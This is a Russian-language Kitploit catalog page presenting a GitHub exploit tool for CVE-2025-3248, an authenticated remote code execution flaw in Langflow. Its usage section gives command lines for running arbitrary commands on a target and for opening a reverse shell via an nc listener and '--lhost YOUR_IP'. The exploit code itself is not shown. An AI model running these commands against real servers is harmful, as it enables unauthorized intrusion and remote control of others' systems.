Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RCE-CVE-2025-3248 — Этот Python-скрипт использует уязвимость CVE-2025-3248 для выполнения произвольных команд или создания обратной оболочки на уязвимой системе. Для использования этого эксплойта требуется аутентификация. | Kitploit
Инструменты/GitHubGitHub/tiemio/rce-cve-2025-3248
ЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

Этот Python-скрипт использует уязвимость CVE-2025-3248 для выполнения произвольных команд или создания обратной оболочки на уязвимой системе. Для использования этого эксплойта требуется аутентификация.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Аутентифицированное удаленное выполнение кода CVE-2025-3248 Langflow

Этот Python-скрипт эксплуатирует CVE-2025-3248 для выполнения произвольных команд или создания обратной оболочки на уязвимой системе. Для использования этого эксплойта требуется аутентификация.


Возможности

  • Аутентифицированное выполнение команд: Выполнение произвольных системных команд на цели.
  • Обратная оболочка: Создание обратной оболочки для вашего слушателя.
  • Поддержка прокси: Маршрутизация запросов через прокси (например, Burp Suite).

Требования

  • Python 3.x
  • Библиотека requests

Установите зависимости с помощью:

root@kitploit:~
pip install requests

Использование

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

Аргументы

АргументОписаниеОбязательно
-u, --urlБазовый URL цели (например, https://target.com)Да
-l, --loginИмя администратораДа
-p, --passwordПароль администратораДа
-c, --commandКоманда для выполнения на целиНет*
--proxyURL прокси (например, http://127.0.0.1:8080)Нет
--lhostЛокальный хост для обратной оболочкиНет*
--lportЛокальный порт для обратной оболочкиНет*

* Вы должны указать либо команду (-c), либо оба параметра --lhost и --lport для обратной оболочки.


Примеры

1. Выполнение команды

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. Получение обратной оболочки

Запустите слушатель на вашей машине:

root@kitploit:~
nc -lvnp 4444

Затем запустите:

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. Использование прокси

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Docker образ

Развертывание образа

Вы можете развернуть Docker-образ с помощью следующей команды:

root@kitploit:~
podman compose up -d

Образ будет доступен по адресу http://localhost:7860. Авторство файла compose: Этот репозиторий


Отказ от ответственности

Этот скрипт предназначен только для образовательных и авторизованных тестов на проникновение. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


Этот readme создан ИИ.

Скачать инструмент